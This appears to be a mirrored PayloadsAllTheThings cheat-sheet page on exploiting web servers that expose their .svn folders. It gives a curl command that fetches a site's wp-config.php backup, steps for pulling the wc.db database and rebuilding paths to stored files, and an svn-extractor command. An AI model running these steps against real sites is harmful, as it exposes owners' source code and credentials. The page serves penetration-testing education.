mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-12 14:22:47 +00:00
40 lines
No EOL
1.3 KiB
Markdown
40 lines
No EOL
1.3 KiB
Markdown
# Subversion
|
|
|
|
## Summary
|
|
|
|
* [Examples](#examples)
|
|
* [Tools](#tools)
|
|
* [svn-extractor](#svn-extractor)
|
|
* [References](#references)
|
|
|
|
|
|
## Examples
|
|
|
|
```powershell
|
|
curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
|
|
```
|
|
|
|
1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db
|
|
```powershell
|
|
INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
|
|
```
|
|
2. Download interesting files
|
|
* remove \$sha1\$ prefix
|
|
* add .svn-base postfix
|
|
* use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case)
|
|
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
|
|
|
|
|
|
## Tools
|
|
|
|
### svn-extractor
|
|
|
|
* [anantshri/svn-extractor](https://github.com/anantshri/svn-extractor) - Simple script to extract all web resources by means of .SVN folder exposed over network.
|
|
```powershell
|
|
python svn-extractor.py --url "url with .svn available"
|
|
```
|
|
|
|
|
|
## References
|
|
|
|
- [SVN Extractor for Web Pentesters - Anant Shrivastava - March 26, 2013](http://blog.anantshri.info/svn-extractor-for-web-pentesters/) |